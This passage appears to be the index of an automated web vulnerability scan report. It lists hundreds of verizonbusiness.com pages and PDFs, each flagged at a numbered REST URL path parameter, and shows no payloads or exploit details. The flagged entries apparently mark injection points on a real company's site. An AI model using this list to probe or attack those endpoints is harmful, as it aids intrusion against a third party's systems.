1.625. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

1.626. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]

1.627. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

1.628. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 2]

1.629. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

1.630. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

1.631. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

1.632. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

1.633. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

1.634. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

1.635. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

1.636. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

1.637. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

1.638. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

1.639. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

1.640. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

1.641. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

1.642. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

1.643. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

1.644. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

1.645. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

1.646. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

1.647. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

1.648. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

1.649. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

1.650. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

1.651. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

1.652. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

1.653. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

1.654. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

1.655. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

1.656. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

1.657. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

1.658. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

1.659. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

1.660. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

1.661. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

1.662. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

1.663. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

1.664. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

1.665. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

1.666. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

1.667. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

1.668. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

1.669. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

1.670. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]

1.671. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

1.672. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]

1.673. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

1.674. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]

1.675. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

1.676. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]

1.677. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

1.678. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]

1.679. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

1.680. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]

1.681. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

1.682. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]

1.683. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

1.684. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]

1.685. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

1.686. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]

1.687. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

1.688. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]

1.689. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

1.690. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]

1.691. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

1.692. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]

1.693. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

1.694. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]

1.695. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

1.696. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]

1.697. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

1.698. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]

1.699. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

1.700. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]

1.701. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

1.702. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]

1.703. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

1.704. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 2]

1.705. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

1.706. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 1]

1.707. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

1.708. http://www.verizonbusiness.com/resources/1002a3a11-111-Blogs.xml [REST URL parameter 2]

1.709. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

1.710. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 1]

1.711. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

1.712. http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml [REST URL parameter 2]

1.713. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

1.714. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 1]

1.715. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

1.716. http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml [REST URL parameter 2]

1.717. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

1.718. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 1]

1.719. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

1.720. http://www.verizonbusiness.com/resources/1002a3a14-111-Solutions+Briefs.xml [REST URL parameter 2]

1.721. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

1.722. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 1]

1.723. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

1.724. http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml [REST URL parameter 2]

1.725. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

1.726. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 1]

1.727. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

1.728. http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml [REST URL parameter 2]

1.729. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

1.730. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 1]

1.731. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

1.732. http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml [REST URL parameter 2]

1.733. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

1.734. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 1]

1.735. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

1.736. http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml [REST URL parameter 2]

1.737. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

1.738. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 1]

1.739. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

1.740. http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml [REST URL parameter 2]

1.741. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

1.742. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 1]

1.743. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

1.744. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos [REST URL parameter 2]

1.745. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

1.746. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 1]

1.747. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

1.748. http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml [REST URL parameter 2]

1.749. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

1.750. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 1]

1.751. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

1.752. http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml [REST URL parameter 2]

1.753. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

1.754. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]

1.755. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

1.756. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]

1.757. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

1.758. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

1.759. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

1.760. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

1.761. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

1.762. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

1.763. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

1.764. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

1.765. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

1.766. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

1.767. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

1.768. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

1.769. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

1.770. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

1.771. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

1.772. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 2]

1.773. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

1.774. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 3]

1.775. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

1.776. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 1]

1.777. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

1.778. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 2]

1.779. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

1.780. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]

1.781. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.782. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.783. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.784. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.785. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.786. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

1.787. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]

1.788. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

1.789. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]

1.790. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

1.791. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]

1.792. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

1.793. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]

1.794. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

1.795. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]

1.796. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 3]

1.797. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.798. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.799. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.800. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.801. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.802. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.803. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.804. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.805. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.806. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.807. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

1.808. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

1.809. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

1.810. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

1.811. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

1.812. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

1.813. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

1.814. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

1.815. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

1.816. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

1.817. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

1.818. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

1.819. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

1.820. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

1.821. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

1.822. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 2]

1.823. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

1.824. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 3]

1.825. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

1.826. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 1]

1.827. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

1.828. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 2]

1.829. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

1.830. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_infrastructure_that_adapts_to_your_business_en_xg.pdf [REST URL parameter 3]

1.831. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

1.832. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 1]

1.833. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

1.834. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 2]

1.835. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

1.836. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 3]

1.837. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

1.838. http://www.verizonbusiness.com/resources/whitepapers/itsolutions/wp_cloud-computing_en_xg.pdf [REST URL parameter 4]

1.839. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

1.840. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 1]

1.841. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

1.842. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]

1.843. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

1.844. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]

1.845. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

1.846. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]

1.847. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

1.848. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]

1.849. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

1.850. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]

1.851. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

1.852. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]

1.853. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

1.854. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]

1.855. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

1.856. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]

1.857. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

1.858. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

1.859. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

1.860. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

1.861. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

1.862. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

1.863. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

1.864. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

1.865. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

1.866. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

1.867. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

1.868. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

1.869. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

1.870. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

1.871. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

1.872. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

1.873. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

1.874. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

1.875. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

1.876. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

1.877. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

1.878. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

1.879. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

1.880. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

1.881. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

1.882. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

1.883. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

1.884. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

1.885. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

1.886. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

1.887. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

1.888. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

1.889. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

1.890. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

1.891. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

1.892. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

1.893. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

1.894. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

1.895. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

1.896. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 3]

1.897. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

1.898. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 1]

1.899. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

1.900. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 2]

1.901. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

1.902. http://www.verizonbusiness.com/solutions/byneed/risk/ [REST URL parameter 3]

1.903. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

